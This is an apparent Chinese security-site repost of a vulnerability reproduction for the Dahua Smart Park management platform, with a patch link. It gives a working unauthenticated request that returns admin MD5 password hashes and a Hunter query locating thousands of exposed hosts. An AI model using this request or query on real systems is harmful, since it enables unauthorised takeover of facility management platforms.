【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

admin 2023年8月28日01:40:32评论319 views字数 628阅读2分5秒阅读模式

0x01 阅读须知

天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

0x02 漏洞描述

(一) 大华智慧园区综合管理平台

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。于该平台未对接口权限做限制,攻击者可以从user_getUserInfoByUserName.action接口获取任意用户密码(MD5格式)

【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

影响范围

hunter语法:

web.body="“/WPMS/asset/lib/gridster/”"
hunter共4,281条资产

【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

(二) 漏洞poc
GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1Host:

【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

获取到systerm登陆密码的MD5值去解密从而登陆系统

【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

0x03 修复方案

官方修复缓解措施

补丁链接

https://support.dahuatech.com/networkSecurity

原文始发于微信公众号(天擎攻防实验室):【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月28日01:40:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞https://cn-sec.com/archives/1983387.html

发表评论

匿名网友 填写信息